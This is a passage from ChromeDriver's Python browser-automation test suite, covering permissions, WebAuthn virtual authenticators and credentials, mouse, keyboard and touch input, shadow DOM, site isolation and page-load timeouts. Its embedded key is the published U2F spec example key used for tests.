self.CheckPermission(self.GetPermission('geolocation'), 'denied')
def testPermissionsSameOriginDoesNotAffectOthers(self):
""" Tests whether permissions set between two domains affect others. """
window_handle = self._driver.NewWindow()['handle']
self._driver.SwitchToWindow(window_handle)
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/link_nav.html'))
another_window_handle = self._driver.NewWindow()['handle']
self._driver.SwitchToWindow(another_window_handle)
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
different_domain = self._driver.NewWindow()['handle']
self._driver.SwitchToWindow(different_domain)
self._driver.Load('https://google.com')
self._driver.SetPermission({ 'descriptor': {'name': 'geolocation'},
'state': 'denied' })
# Switch for permissions.
self._driver.SwitchToWindow(another_window_handle)
# Set permission.
parameters = { 'descriptor': { 'name': 'geolocation' }, 'state': 'prompt' }
# Test that they are present across the same domain.
self._driver.SetPermission(parameters)
self.CheckPermission(self.GetPermission('geolocation'), 'prompt')
self._driver.SwitchToWindow(window_handle)
self.CheckPermission(self.GetPermission('geolocation'), 'prompt')
# Assert different domain is not the same.
self._driver.SwitchToWindow(different_domain)
self.CheckPermission(self.GetPermission('geolocation'), 'denied')
# Tests that the webauthn capabilities are true on desktop and false on
# android.
def testWebauthnVirtualAuthenticatorsCapability(self):
is_desktop = _ANDROID_PACKAGE_KEY is None
self.assertEqual(
is_desktop,
self._driver.capabilities['webauthn:virtualAuthenticators'])
self.assertEqual(
is_desktop,
self._driver.capabilities['webauthn:extension:largeBlob'])
def testCanClickInIframesInShadow(self):
"""Test that you can interact with a iframe within a shadow element.
See https://bugs.chromium.org/p/chromedriver/issues/detail?id=3445
"""
self._driver.SetTimeouts({'implicit': 2000})
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_iframe.html'))
frame = self._driver.ExecuteScript(
'''return document.querySelector("#shadow")
.shadowRoot.querySelector("iframe")''')
self._driver.SwitchToFrame(frame)
message = self._driver.FindElement('css selector', '#message')
self.assertTrue('clicked' not in message.GetText())
button = self._driver.FindElement('tag name', 'button')
button.Click()
message = self._driver.FindElement('css selector', '#message.result')
self.assertTrue('clicked' in message.GetText())
def testCanClickInIframesInShadowScrolled(self):
"""Test that you can interact with a scrolled iframe
within a scrolled shadow element.
See https://bugs.chromium.org/p/chromedriver/issues/detail?id=3445
"""
self._driver.SetTimeouts({'implicit': 2000})
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_iframe.html'))
frame = self._driver.ExecuteScript(
'''return document.querySelector("#shadow_scroll")
.shadowRoot.querySelector("iframe")''')
self._driver.SwitchToFrame(frame)
message = self._driver.FindElement('css selector', '#message')
self.assertTrue('clicked' not in message.GetText())
button = self._driver.FindElement('tag name', 'button')
button.Click()
message = self._driver.FindElement('css selector', '#message.result')
self.assertTrue('clicked' in message.GetText())
class ChromeDriverBackgroundTest(ChromeDriverBaseTestWithWebServer):
def setUp(self):
self._driver1 = self.CreateDriver()
self._driver2 = self.CreateDriver()
def testBackgroundScreenshot(self):
self._driver2.Load(self._http_server.GetUrl('localhost')
+ '/chromedriver/empty.html')
self._driver1.Load(self._http_server.GetUrl('localhost')
+ '/chromedriver/empty.html')
screenshotPNGBase64 = self._driver1.TakeScreenshot()
self.assertIsNotNone(screenshotPNGBase64)
# Tests that require a secure context.
class ChromeDriverSecureContextTest(ChromeDriverBaseTestWithWebServer):
# The example attestation private key from the U2F spec at
# https://fidoalliance.org/specs/fido-u2f-v1.2-ps-20170411/fido-u2f-raw-message-formats-v1.2-ps-20170411.html#registration-example
# PKCS.8 encoded without encryption, as a base64url string.
privateKey = ("MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQg8_zMDQDYAxlU-Q"
"hk1Dwkf0v18GZca1DMF3SaJ9HPdmShRANCAASNYX5lyVCOZLzFZzrIKmeZ2jwU"
"RmgsJYxGP__fWN_S-j5sN4tT15XEpN_7QZnt14YvI6uvAgO0uJEboFaZlOEB")
@staticmethod
def GetHttpsUrlForFile(file_path, host=None):
return ChromeDriverSecureContextTest._https_server.GetUrl(
host) + file_path
# Encodes a string in URL-safe base64 with no padding.
@staticmethod
def URLSafeBase64Encode(string):
encoded = base64.urlsafe_b64encode(string)
while encoded[-1] == "=":
encoded = encoded[0:-1]
return encoded
# Decodes a base64 string with no padding.
@staticmethod
def UrlSafeBase64Decode(string):
string = string.encode("utf-8")
if len(string) % 4 != 0:
string += "=" * (4 - len(string) % 4)
return base64.urlsafe_b64decode(string)
def setUp(self):
self._driver = self.CreateDriver(
accept_insecure_certs=True,
chrome_switches=['host-resolver-rules=MAP * 127.0.0.1',
'enable-experimental-web-platform-features'])
def testAddVirtualAuthenticator(self):
script = """
let done = arguments[0];
registerCredential({
authenticatorSelection: {
requireResidentKey: true,
},
extensions: {
largeBlob: {
support: 'preferred',
},
},
}).then(done);
"""
self._driver.Load(self.GetHttpsUrlForFile(
'/chromedriver/webauthn_test.html', 'chromedriver.test'))
self._driver.AddVirtualAuthenticator(
protocol = 'ctap2_1',
transport = 'usb',
hasResidentKey = True,
hasUserVerification = True,
isUserConsenting = True,
isUserVerified = True,
extensions = ['largeBlob']
)
result = self._driver.ExecuteAsyncScript(script)
self.assertEquals('OK', result['status'])
self.assertEquals(['usb'], result['credential']['transports'])
self.assertEquals(True, result['extensions']['largeBlob']['supported'])
def testAddVirtualAuthenticatorProtocolVersion(self):
self._driver.Load(self.GetHttpsUrlForFile(
'/chromedriver/webauthn_test.html', 'chromedriver.test'))
for protocol in ['ctap1/u2f', 'ctap2', 'ctap2_1']:
authenticator_id = self._driver.AddVirtualAuthenticator(
protocol = protocol,
transport = 'usb',
)
self.assertTrue(len(authenticator_id) > 0)
self.assertRaisesRegexp(
chromedriver.UnsupportedOperation,
'INVALID is not a recognized protocol version',
self._driver.AddVirtualAuthenticator,
protocol = 'INVALID',
transport = 'usb')
def testAddVirtualBadExtensions(self):
self.assertRaisesRegexp(
chromedriver.InvalidArgument,
'extensions must be a list of strings',
self._driver.AddVirtualAuthenticator, protocol = 'ctap2', transport =
'usb', extensions = 'invalid')
self.assertRaisesRegexp(
chromedriver.InvalidArgument,
'extensions must be a list of strings',
self._driver.AddVirtualAuthenticator, protocol = 'ctap2', transport =
'usb', extensions = [42])
self.assertRaisesRegexp(
chromedriver.UnsupportedOperation,
'smolBlowbs is not a recognized extension',
self._driver.AddVirtualAuthenticator, protocol = 'ctap2', transport =
'usb', extensions = ['smolBlowbs'])
def testAddVirtualAuthenticatorDefaultParams(self):
script = """
let done = arguments[0];
registerCredential().then(done);
"""
self._driver.Load(self.GetHttpsUrlForFile(
'/chromedriver/webauthn_test.html', 'chromedriver.test'))
self._driver.AddVirtualAuthenticator(
protocol = 'ctap1/u2f',
transport = 'usb',
)
result = self._driver.ExecuteAsyncScript(script)
self.assertEquals('OK', result['status'])
self.assertEquals(['usb'], result['credential']['transports'])
def testRemoveVirtualAuthenticator(self):
self._driver.Load(self.GetHttpsUrlForFile(
'/chromedriver/webauthn_test.html', 'chromedriver.test'))
# Removing a non existent virtual authenticator should fail.
self.assertRaisesRegexp(
chromedriver.InvalidArgument,
'Could not find a Virtual Authenticator matching the ID',
self._driver.RemoveVirtualAuthenticator, 'id')
# Create an authenticator and try removing it.
authenticatorId = self._driver.AddVirtualAuthenticator(
protocol = 'ctap2',
transport = 'usb',
hasResidentKey = False,
hasUserVerification = False,
)
self._driver.RemoveVirtualAuthenticator(authenticatorId)
# Trying to remove the same authenticator should fail.
self.assertRaisesRegexp(
chromedriver.InvalidArgument,
'Could not find a Virtual Authenticator matching the ID',
self._driver.RemoveVirtualAuthenticator, authenticatorId)
def testAddCredential(self):
script = """
let done = arguments[0];
getCredential({
type: "public-key",
id: new TextEncoder().encode("cred-1"),
transports: ["usb"],
}).then(done);
"""
self._driver.Load(self.GetHttpsUrlForFile(
'/chromedriver/webauthn_test.html', 'chromedriver.test'))
authenticatorId = self._driver.AddVirtualAuthenticator(
protocol = 'ctap2',
transport = 'usb',
hasResidentKey = False,
hasUserVerification = False,
)
# Register a credential and try authenticating with it.
self._driver.AddCredential(
authenticatorId = authenticatorId,
credentialId = self.URLSafeBase64Encode("cred-1"),
isResidentCredential=False,
rpId="chromedriver.test",
privateKey=self.privateKey,
signCount=1,
)
result = self._driver.ExecuteAsyncScript(script)
self.assertEquals('OK', result['status'])
def testAddCredentialLargeBlob(self):
script = """
let done = arguments[0];
getCredential({
type: "public-key",
id: new TextEncoder().encode("cred-1"),
transports: ["usb"],
}, {
extensions: {
largeBlob: {
read: true,
},
},
}).then(done);
"""
self._driver.Load(self.GetHttpsUrlForFile(
'/chromedriver/webauthn_test.html', 'chromedriver.test'))
authenticatorId = self._driver.AddVirtualAuthenticator(
protocol = 'ctap2_1',
transport = 'usb',
hasResidentKey = True,
hasUserVerification = True,
isUserVerified = True,
extensions = ['largeBlob']
)
# Register a credential with a large blob and try reading it.
self._driver.AddCredential(
authenticatorId = authenticatorId,
credentialId = self.URLSafeBase64Encode('cred-1'),
userHandle = self.URLSafeBase64Encode('erina'),
largeBlob = self.URLSafeBase64Encode('large blob contents'),
isResidentCredential = True,
rpId = "chromedriver.test",
privateKey = self.privateKey,
signCount = 1,
)
result = self._driver.ExecuteAsyncScript(script)
self.assertEquals('OK', result['status'])
self.assertEquals('large blob contents', result['blob'])
def testAddCredentialBase64Errors(self):
# Test that AddCredential checks UrlBase64 parameteres.
self._driver.Load(self.GetHttpsUrlForFile(
'/chromedriver/webauthn_test.html', 'chromedriver.test'))
authenticatorId = self._driver.AddVirtualAuthenticator(
protocol = 'ctap2',
transport = 'usb',
hasResidentKey = False,
hasUserVerification = False,
)
# Try adding a credentialId that is encoded in vanilla base64.
self.assertRaisesRegexp(
chromedriver.InvalidArgument,
'credentialId must be a base64url encoded string',
self._driver.AddCredential, authenticatorId, '_0n+wWqg=',
False, "chromedriver.test", self.privateKey, None, 1,
)
# Try adding a credentialId that is not a string.
self.assertRaisesRegexp(
chromedriver.InvalidArgument,
'credentialId must be a base64url encoded string',
self._driver.AddCredential, authenticatorId, 1,
False, "chromedriver.test", self.privateKey, None, 1,
)
def testGetCredentials(self):
script = """
let done = arguments[0];
registerCredential({
authenticatorSelection: {
requireResidentKey: true,
},
extensions: {
largeBlob: {
support: "required",
},
},
}).then(attestation =>
getCredential({
type: "public-key",
id: Uint8Array.from(attestation.credential.rawId),
transports: ["usb"],
}, {
extensions: {
largeBlob: {
write: new TextEncoder().encode("large blob contents"),
},
},
})).then(done);
"""
self._driver.Load(self.GetHttpsUrlForFile(
'/chromedriver/webauthn_test.html', 'chromedriver.test'))
authenticatorId = self._driver.AddVirtualAuthenticator(
protocol = 'ctap2_1',
transport = 'usb',
hasResidentKey = True,
hasUserVerification = True,
isUserVerified = True,
extensions = ['largeBlob']
)
# Register a credential via the webauthn API and set a large blob on it.
result = self._driver.ExecuteAsyncScript(script)
self.assertEquals('OK', result['status'])
self.assertEquals(True, result['extensions']['largeBlob']['written'])
credentialId = result['attestation']['id']
# GetCredentials should return the credential that was just created.
credentials = self._driver.GetCredentials(authenticatorId)
self.assertEquals(1, len(credentials))
self.assertEquals(credentialId, credentials[0]['credentialId'])
self.assertEquals(True, credentials[0]['isResidentCredential'])
self.assertEquals('chromedriver.test', credentials[0]['rpId'])
self.assertEquals(chr(1),
self.UrlSafeBase64Decode(credentials[0]['userHandle']))
self.assertEquals(2, credentials[0]['signCount'])
self.assertTrue(credentials[0]['privateKey'])
self.assertEquals('large blob contents',
self.UrlSafeBase64Decode(credentials[0]['largeBlob']))
def testRemoveCredential(self):
script = """
let done = arguments[0];
registerCredential().then(done);
"""
self._driver.Load(self.GetHttpsUrlForFile(
'/chromedriver/webauthn_test.html', 'chromedriver.test'))
authenticatorId = self._driver.AddVirtualAuthenticator(
protocol = 'ctap2',
transport = 'usb',
)
# Register two credentials.
result = self._driver.ExecuteAsyncScript(script)
self.assertEquals('OK', result['status'])
credential1Id = result['credential']['id']
result = self._driver.ExecuteAsyncScript(script)
self.assertEquals('OK', result['status'])
credential2Id = result['credential']['id']
# GetCredentials should return both credentials.
credentials = self._driver.GetCredentials(authenticatorId)
self.assertEquals(2, len(credentials))
# Removing the first credential should leave only the first one.
self._driver.RemoveCredential(authenticatorId, credential1Id)
credentials = self._driver.GetCredentials(authenticatorId)
self.assertEquals(1, len(credentials))
self.assertEquals(credential2Id, credentials[0]['credentialId'])
def testRemoveAllCredentials(self):
register_credential_script = """
let done = arguments[0];
registerCredential().then(done);
"""
self._driver.Load(self.GetHttpsUrlForFile(
'/chromedriver/webauthn_test.html', 'chromedriver.test'))
authenticatorId = self._driver.AddVirtualAuthenticator(
protocol = 'ctap2',
transport = 'usb',
)
# Register a credential via the webauthn API.
result = self._driver.ExecuteAsyncScript(register_credential_script)
self.assertEquals('OK', result['status'])
credentialId = result['credential']['rawId']
# Attempting to register with the credential ID on excludeCredentials should
# fail.
exclude_credentials_script = """
let done = arguments[0];
registerCredential({
excludeCredentials: [{
type: "public-key",
id: Uint8Array.from(%s),
transports: ["usb"],
}],
}).then(done);
""" % (credentialId)
result = self._driver.ExecuteAsyncScript(exclude_credentials_script)
self.assertEquals("InvalidStateError: The user attempted to register an "
"authenticator that contains one of the credentials "
"already registered with the relying party.",
result['status'])
# The registration should succeed after clearing the credentials.
self._driver.RemoveAllCredentials(authenticatorId)
result = self._driver.ExecuteAsyncScript(exclude_credentials_script)
self.assertEquals('OK', result['status'])
def testSetUserVerified(self):
register_uv_script = """
let done = arguments[0];
registerCredential({
authenticatorSelection: {
userVerification: "required",
},
}).then(done);
"""
self._driver.Load(self.GetHttpsUrlForFile(
'/chromedriver/webauthn_test.html', 'chromedriver.test'))
authenticatorId = self._driver.AddVirtualAuthenticator(
protocol = 'ctap2',
transport = 'usb',
hasResidentKey = True,
hasUserVerification = True,
)
# Configure the virtual authenticator to fail user verification.
self._driver.SetUserVerified(authenticatorId, False)
# Attempting to register a credential with UV required should fail.
result = self._driver.ExecuteAsyncScript(register_uv_script)
self.assertTrue(result['status'].startswith("NotAllowedError"),
"Expected %s to be a NotAllowedError" % (result['status']))
# Trying again after setting userVerified to True should succeed.
self._driver.SetUserVerified(authenticatorId, True)
result = self._driver.ExecuteAsyncScript(register_uv_script)
self.assertEquals("OK", result['status'])
# Tests in the following class are expected to be moved to ChromeDriverTest
# class when we no longer support the legacy mode.
class ChromeDriverW3cTest(ChromeDriverBaseTestWithWebServer):
"""W3C mode specific tests."""
def setUp(self):
self._driver = self.CreateDriver(
send_w3c_capability=True, send_w3c_request=True)
def testSendKeysToElement(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
text = self._driver.ExecuteScript(
'document.body.innerHTML = \'<input type="text">\';'
'var input = document.getElementsByTagName("input")[0];'
'input.addEventListener("change", function() {'
' document.body.appendChild(document.createElement("br"));'
'});'
'return input;')
text.SendKeys('0123456789+-*/ Hi')
text.SendKeys(', there!')
value = self._driver.ExecuteScript('return arguments[0].value;', text)
self.assertEquals('0123456789+-*/ Hi, there!', value)
def testSendKeysToElementDoesNotAppend(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/empty.html'))
textControlTypes = ["text", "search", "tel", "url", "password"]
for textType in textControlTypes:
element = self._driver.ExecuteScript(
'document.body.innerHTML = '
'\'<input type="{}" value="send_this_value">\';'
'var input = document.getElementsByTagName("input")[0];'
'input.focus();'
'input.setSelectionRange(0,0);'
'return input;'.format(textType))
element.SendKeys('hello')
value = self._driver.ExecuteScript('return arguments[0].value;',
element)
self.assertEquals('hellosend_this_value', value)
def testSendKeysToEditableElement(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/empty.html'))
element = self._driver.ExecuteScript(
'document.body.innerHTML = '
'\'<p contentEditable="true"> <i>hello-></i> '
'<b>send_this_value </b> </p>\';'
'var input = document.getElementsByTagName("i")[0];'
'return input;')
element.SendKeys('hello')
self.assertEquals(u'hello->hello', element.GetText())
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/empty.html'))
element = self._driver.ExecuteScript(
'document.body.innerHTML = '
'\'<p contentEditable="true"> <i>hello</i> '
'<b>-></b> </p>\';'
'var input = document.getElementsByTagName("p")[0];'
'input.focus();'
'return input;')
element.SendKeys('hello')
self.assertEquals(u'hellohello ->', element.GetText())
def testUnexpectedAlertOpenExceptionMessage(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript('window.alert("Hi");')
self.assertRaisesRegexp(chromedriver.UnexpectedAlertOpen,
'{Alert text : Hi}',
self._driver.FindElement, 'tag name', 'divine')
# In W3C mode, the alert is dismissed by default.
self.assertFalse(self._driver.IsAlertOpen())
class ChromeDriverTestLegacy(ChromeDriverBaseTestWithWebServer):
"""End to end tests for ChromeDriver in Legacy mode."""
def setUp(self):
self._driver = self.CreateDriver(send_w3c_capability=False,
send_w3c_request=False)
def testContextMenuEventFired(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/context_menu.html'))
self._driver.MouseMoveTo(self._driver.FindElement('tag name', 'div'))
self._driver.MouseClick(2)
self.assertTrue(self._driver.ExecuteScript('return success'))
def testDragAndDropWithSVGImage(self):
self._driver.Load(
self.GetHttpUrlForFile('/chromedriver/drag_and_drop.svg'))
drag = self._driver.FindElement("css selector", "#GreenRectangle")
drop = self._driver.FindElement("css selector", "#FolderRectangle")
self._driver.MouseMoveTo(drag)
self._driver.MouseButtonDown()
self._driver.MouseMoveTo(drop)
self._driver.MouseButtonUp()
self.assertTrue(self._driver.IsAlertOpen())
self.assertEquals('GreenRectangle has been dropped into a folder.',
self._driver.GetAlertMessage())
self._driver.HandleAlert(True)
self.assertEquals('translate(300,55)', drag.GetAttribute("transform"))
def testMouseButtonDownAndUp(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("mousedown", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new1<br>";'
'});'
'div.addEventListener("mouseup", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new2<a></a>";'
'});')
self._driver.MouseMoveTo(None, 50, 50)
self._driver.MouseButtonDown()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
self._driver.MouseButtonUp()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'a')))
def testMouseClick(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("click", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
self._driver.MouseMoveTo(div)
self._driver.MouseClick()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testMouseDoubleClick(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("dblclick", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
self._driver.MouseMoveTo(div, 1, 1)
self._driver.MouseDoubleClick()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testMouseMoveTo(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("mouseover", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
self._driver.MouseMoveTo(div, 10, 10)
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testMoveToElementAndClick(self):
# This page gets rendered differently depending on which platform the test
# is running on, and what window size is being used. So we need to do some
# sanity checks to make sure that the <a> element is split across two lines
# of text.
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/multiline.html'))
# Check that link element spans two lines and that the first ClientRect is
# above the second.
link = self._driver.FindElements('tag name', 'a')[0]
client_rects = self._driver.ExecuteScript(
'return arguments[0].getClientRects();', link)
self.assertEquals(2, len(client_rects))
self.assertTrue(client_rects[0]['bottom'] <= client_rects[1]['top'])
# Check that the center of the link's bounding ClientRect is outside the
# element.
bounding_client_rect = self._driver.ExecuteScript(
'return arguments[0].getBoundingClientRect();', link)
center = bounding_client_rect['left'] + bounding_client_rect['width'] / 2
self.assertTrue(client_rects[1]['right'] < center)
self.assertTrue(center < client_rects[0]['left'])
self._driver.MouseMoveTo(link)
self._driver.MouseClick()
self.assertTrue(self._driver.GetCurrentUrl().endswith('#top'))
def _FindElementInShadowDom(self, css_selectors):
"""Find an element inside shadow DOM using CSS selectors.
The last item in css_selectors identify the element to find. All preceding
selectors identify the hierarchy of shadow hosts to traverse in order to
reach the target shadow DOM."""
current = None
for selector in css_selectors:
if current is None:
# First CSS selector, start from root DOM.
current = self._driver
else:
# current is a shadow host selected previously.
# Enter the corresponding shadow root.
current = self._driver.ExecuteScript(
'return arguments[0].shadowRoot', current)
current = current.FindElement('css selector', selector)
return current
def testShadowDomDisplayed(self):
"""Checks that trying to manipulate shadow DOM elements that are detached
from the document raises a StaleElementReference exception"""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
elem = self._FindElementInShadowDom(
["#innerDiv", "#parentDiv", "#button"])
self.assertTrue(elem.IsDisplayed())
elem2 = self._driver.FindElement("css selector", "#hostContent")
self.assertTrue(elem2.IsDisplayed())
self._driver.ExecuteScript(
'document.querySelector("#outerDiv").style.display="None";')
self.assertFalse(elem.IsDisplayed())
def testSendingTabKeyMovesToNextInputElement(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/two_inputs.html'))
first = self._driver.FindElement('css selector', '#first')
second = self._driver.FindElement('css selector', '#second')
first.Click()
self._driver.SendKeys('snoopy')
self._driver.SendKeys(u'\uE004')
self._driver.SendKeys('prickly pete')
self.assertEquals('snoopy', self._driver.ExecuteScript(
'return arguments[0].value;', first))
self.assertEquals('prickly pete', self._driver.ExecuteScript(
'return arguments[0].value;', second))
def testSendingTabKeyMovesToNextInputElementEscapedTab(self):
"""This behavior is not specified by the WebDriver standard
but it is supported by us de facto.
According to this table https://www.w3.org/TR/webdriver/#keyboard-actions
the code point 0x09 (HT) must be sent to the browser via a CompositionEvent.
We however historically have been sending it as KeyEvent
with code = ui::VKEY_TAB which leads to focus change.
For the sake of contrast GeckoDriver and Firefox do not show this behavior.
If in the future it turns out that our current behavior is undesirable
we can remove this test.
"""
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/two_inputs.html'))
first = self._driver.FindElement('css selector', '#first')
second = self._driver.FindElement('css selector', '#second')
first.Click()
self._driver.SendKeys('snoopy\tprickly pete')
self.assertEquals('snoopy', first.GetProperty('value'))
self.assertEquals('prickly pete', second.GetProperty('value'))
def testMobileEmulationDisabledByDefault(self):
self.assertFalse(self._driver.capabilities['mobileEmulationEnabled'])
def testSendKeysToElement(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
text = self._driver.ExecuteScript(
'document.body.innerHTML = \'<input type="text">\';'
'var input = document.getElementsByTagName("input")[0];'
'input.addEventListener("change", function() {'
' document.body.appendChild(document.createElement("br"));'
'});'
'return input;')
text.SendKeys('0123456789+-*/ Hi')
text.SendKeys(', there!')
value = self._driver.ExecuteScript('return arguments[0].value;', text)
self.assertEquals('0123456789+-*/ Hi, there!', value)
def testUnexpectedAlertOpenExceptionMessage(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript('window.alert("Hi");')
self.assertRaisesRegexp(chromedriver.UnexpectedAlertOpen,
'unexpected alert open: {Alert text : Hi}',
self._driver.FindElement, 'tag name', 'divine')
def testTouchScrollElement(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/touch_action_tests.html'))
scroll_left = 'return document.documentElement.scrollLeft;'
scroll_top = 'return document.documentElement.scrollTop;'
self.assertEquals(0, self._driver.ExecuteScript(scroll_left))
self.assertEquals(0, self._driver.ExecuteScript(scroll_top))
target = self._driver.FindElement('css selector', '#target')
self._driver.TouchScroll(target, 47, 53)
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=1179
self.assertAlmostEqual(47, self._driver.ExecuteScript(scroll_left), delta=1)
self.assertAlmostEqual(53, self._driver.ExecuteScript(scroll_top), delta=1)
def testTouchDoubleTapElement(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/touch_action_tests.html'))
target = self._driver.FindElement('css selector', '#target')
target.DoubleTap()
events = self._driver.FindElement('css selector', '#events')
self.assertEquals('events: touchstart touchend touchstart touchend',
events.GetText())
def testTouchLongPressElement(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/touch_action_tests.html'))
target = self._driver.FindElement('css selector', '#target')
target.LongPress()
events = self._driver.FindElement('css selector', '#events')
self.assertEquals('events: touchstart touchcancel', events.GetText())
def testTouchSingleTapElement(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/touch_action_tests.html'))
target = self._driver.FindElement('css selector', '#target')
target.SingleTap()
events = self._driver.FindElement('css selector', '#events')
self.assertEquals('events: touchstart touchend', events.GetText())
class ChromeDriverSiteIsolation(ChromeDriverBaseTestWithWebServer):
"""Tests for ChromeDriver with the new Site Isolation Chrome feature.
This feature can be turned on using the --site-per-process flag.
In order to trick the test into thinking that we are on two separate origins,
the cross_domain_iframe.html code points to localhost instead of 127.0.0.1.
Note that Chrome does not allow "localhost" to be passed to --isolate-origins
for fixable technical reasons related to subdomain matching.
"""
def setUp(self):
self._driver = self.CreateDriver(chrome_switches=['--site-per-process'])
def testCanClickOOPIF(self):
"""Test that you can click into an Out of Process I-Frame (OOPIF).
Note that the Iframe will not be out-of-process if the correct
flags are not passed into Chrome.
"""
if util.GetPlatformName() == 'win':
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=2198
# This test is unreliable on Windows, as FindElement can be called too
# soon, before the child frame is fully loaded. This causes element not
# found error. Add an implicit wait works around this issue.
self._driver.SetTimeouts({'implicit': 2000})
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/cross_domain_iframe.html'))
frame = self._driver.FindElement('tag name', 'iframe')
self._driver.SwitchToFrame(frame)
self.assertTrue(self.WaitForCondition(
lambda: 'outer.html' in
self._driver.ExecuteScript('return window.location.href')))
self.assertTrue(self.WaitForCondition(
lambda: 'complete' ==
self._driver.ExecuteScript('return document.readyState')))
self._driver.SwitchToMainFrame()
a_outer = self._driver.FindElement('tag name', 'a')
a_outer.Click()
frame_url = self._driver.ExecuteScript('return window.location.href')
self.assertTrue(frame_url.endswith('#one'))
self._driver.SwitchToFrame(frame)
a_inner = self._driver.FindElement('tag name', 'a')
a_inner.Click()
frame_url = self._driver.ExecuteScript('return window.location.href')
self.assertTrue(frame_url.endswith('#two'))
class ChromeDriverPageLoadTimeoutTest(ChromeDriverBaseTestWithWebServer):
class _RequestHandler(object):
def __init__(self):
self.request_received_event = threading.Event()
self.send_response_event = threading.Event()
def handle(self, request):
self.request_received_event.set()
# Don't hang infinitely, 10 seconds are enough.
self.send_response_event.wait(10)
self.send_response_event.clear()
return {'Cache-Control': 'no-store'}, 'Hi!'
def setUp(self):
self._handler = ChromeDriverPageLoadTimeoutTest._RequestHandler()
self._http_server.SetCallbackForPath('/hang', self._handler.handle)
super(ChromeDriverPageLoadTimeoutTest, self).setUp()
self._driver = self.CreateDriver(
chrome_switches=['host-resolver-rules=MAP * 127.0.0.1'])
self._initial_url = self.GetHttpUrlForFile('/chromedriver/empty.html')
self._driver.Load(self._initial_url)
# When send_response_event is set, navigating to the hang URL takes only
# about 0.1 second on Linux and Windows, but takes half a second or longer
# on Mac. So we use longer timeout on Mac, 0.5 second on others.
timeout = 3000 if util.GetPlatformName() == 'mac' else 500
self._driver.SetTimeouts({'pageLoad': timeout})
def tearDown(self):
super(ChromeDriverPageLoadTimeoutTest, self).tearDown()
self._http_server.SetCallbackForPath('/hang', None)
def _LoadHangingUrl(self, host=None):
self._driver.Load(self._http_server.GetUrl(host) + '/hang')
def _CheckPageLoadTimeout(self, action):
self._handler.request_received_event.clear()
timed_out = False
try:
action()
except chromedriver.ChromeDriverException as e:
self.assertNotEqual(-1, e.message.find('timeout'))
timed_out = True
finally:
self._handler.send_response_event.set()
self.assertTrue(timed_out)
# Verify that the browser actually made that request.
self.assertTrue(self._handler.request_received_event.wait(1))
def testPageLoadTimeout(self):
self._CheckPageLoadTimeout(self._LoadHangingUrl)
self.assertEquals(self._initial_url, self._driver.GetCurrentUrl())
def testPageLoadTimeoutCrossDomain(self):
# Cross-domain navigation is likely to be a cross-process one. In this case
# DevToolsAgentHost behaves quite differently and does not send command
# responses if the navigation hangs, so this case deserves a dedicated test.
self._CheckPageLoadTimeout(lambda: self._LoadHangingUrl('foo.bar'))
self.assertEquals(self._initial_url, self._driver.GetCurrentUrl())
def testHistoryNavigationWithPageLoadTimeout(self):
# Allow the page to load for the first time.
self._handler.send_response_event.set()
self._LoadHangingUrl()
self.assertTrue(self._handler.request_received_event.wait(1))
self._driver.GoBack()
self._CheckPageLoadTimeout(self._driver.GoForward)
self.assertEquals(self._initial_url, self._driver.GetCurrentUrl())
def testRefreshWithPageLoadTimeout(self):
# Allow the page to load for the first time.
